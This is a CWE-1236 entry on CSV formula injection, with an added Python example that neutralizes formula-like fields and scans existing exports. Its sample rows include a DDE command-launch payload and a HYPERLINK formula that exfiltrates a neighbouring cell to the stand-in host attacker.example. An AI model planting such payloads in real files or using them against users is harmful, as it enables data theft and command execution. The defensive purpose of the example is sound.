CWE-1236: Improper Neutralization of Formula Elements in a CSV File
Abstraction: Base · Status: Incomplete
Category: other
Description
The product saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by a spreadsheet product.
Common consequences
- Confidentiality: Read Application Data; Execute Unauthorized Code or Commands. Attackers can populate data fields which, once written to a CSV file, are evaluated as formulas when a spreadsheet product opens the file, and may attempt information exfiltration (for example via a hyperlink that embeds neighbouring cell contents) or other malicious activity. Note that current versions of Excel warn the user before evaluating such untrusted content.
Potential mitigations
- [Implementation] When generating CSV output, ensure that formula-sensitive metacharacters are effectively escaped or removed from all data before storage in the resultant CSV. Risky leading characters include '=' (equal), '+' (plus), '-' (minus), and '@' (at). Widely used hardening guidance (e.g. OWASP's CSV injection page) additionally treats a leading tab or carriage return as risky, since some importers skip them and then evaluate the character that follows.
- [Implementation] If a field starts with a formula character, prepend it with a ' (single apostrophe), which prevents Excel from evaluating the field as a formula. The apostrophe is kept as literal cell content when the CSV is opened, so it alters the exported data; standard CSV quoting of the field (and doubling of embedded double quotes) is still required on top of it.
- [Architecture and Design] Certain implementations of spreadsheet software might refuse to evaluate formulas if the file is untrusted, or if the file is not authored by the current user. This is a control in the consumer, not the producer, and does not remove the need to neutralize the data when the CSV is generated.
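The following is an added example, not code from the CWE entry or from any product it describes. It shows the vulnerable and the neutralized export side by side, using Python's standard csv module, plus a scanner that flags formula-like fields in an already-generated CSV (useful when auditing an existing export). It assumes the apostrophe-prefix mitigation above; the inclusion of tab and carriage return in the metacharacter set follows OWASP guidance rather than the CWE text. The sample rows and the host attacker.example are constructed for the demonstration.

```python
"""Neutralizing CSV formula injection (CWE-1236) at the export boundary.

Added example: not the CWE entry's own code. Sample data is constructed.
"""
import csv
import io

# Leading characters that make a spreadsheet treat a field as a formula.
# '=', '+', '-', '@' are the ones CWE-1236 lists; tab and carriage return
# are added on the assumption (OWASP guidance) that some importers skip
# them and evaluate what follows.
FORMULA_PREFIXES = frozenset("=+-@\t\r")


def is_formula_like(value):
    """True if a non-empty string field starts with a formula metacharacter."""
    return isinstance(value, str) and len(value) > 0 and value[0] in FORMULA_PREFIXES


def neutralize_field(value):
    """Prefix formula-like strings with a single apostrophe so the spreadsheet
    keeps them as literal text. Non-string values are returned unchanged: they
    come from the application's own types, not from attacker-supplied text,
    and a negative int renders as e.g. "-5", which a spreadsheet reads as a
    number rather than a formula."""
    if is_formula_like(value):
        return "'" + value
    return value


def write_csv(rows, neutralize=True):
    """Render rows to CSV text. neutralize=False reproduces the vulnerable
    behaviour in which user-supplied strings are written verbatim."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")  # QUOTE_MINIMAL: quotes fields with , " or newline
    for row in rows:
        writer.writerow([neutralize_field(v) for v in row] if neutralize else row)
    return buf.getvalue()


def _is_plain_number(text):
    """Approximation of 'the spreadsheet would read this as a number'.
    Python's float() accepts a few spellings (e.g. "-inf") a spreadsheet
    would not, so treat the result as a heuristic for auditing only."""
    try:
        float(text)
        return True
    except ValueError:
        return False


def find_formula_fields(csv_text):
    """Scan CSV text and return (row, column, value) for every field that
    starts with a formula metacharacter and is not simply a number."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, field in enumerate(row):
            if is_formula_like(field) and not _is_plain_number(field):
                hits.append((r, c, field))
    return hits


# Constructed sample input: "display_name" is under attacker control.
# Row 2 is the classic DDE-style command launch, row 3 a HYPERLINK that
# exfiltrates the neighbouring balance cell, row 4 a tab-prefixed formula,
# row 5 a benign-looking string plus a legitimately negative number.
SAMPLE_ROWS = [
    ["id", "display_name", "balance"],
    [1, "Alice", 42],
    [2, "=cmd|' /C calc'!A0", 7],
    [3, '=HYPERLINK("https://attacker.example/?d="&C2,"click")', 0],
    [4, "\t+1+1", 3],
    [5, "-not a number", -5],
]

if __name__ == "__main__":
    unsafe = write_csv(SAMPLE_ROWS, neutralize=False)
    safe = write_csv(SAMPLE_ROWS)
    print("vulnerable output:\n" + unsafe)
    print("neutralized output:\n" + safe)
    print("formula-like fields in vulnerable output:", find_formula_fields(unsafe))
    print("formula-like fields in neutralized output:", find_formula_fields(safe))
```

Apply neutralize_field only at the export boundary: the apostrophe becomes part of the cell text, so any downstream program that re-parses the CSV will see it too. The scanner skips fields that parse as plain numbers so that a column of negative balances is not reported as four hundred false positives.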
References
Incoming (9)
| Type | Target | Confidence | Tier |
|---|---|---|---|
| Vulnerability | CVE-2025-14229 | 0% | live |
| Vulnerability | CVE-2025-4546 | 0% | live |
| Vulnerability | CVE-2025-50572 | 0% | live |
| Vulnerability | CVE-2025-54752 | 0% | live |
| Vulnerability | CVE-2025-55745 | 0% | live |
| Vulnerability | CVE-2025-56267 | 0% | live |
| Vulnerability | CVE-2026-23873 | 0% | live |
| Vulnerability | CVE-2026-31049 | 0% | live |
| Vulnerability | CVE-2026-35157 | 0% | live |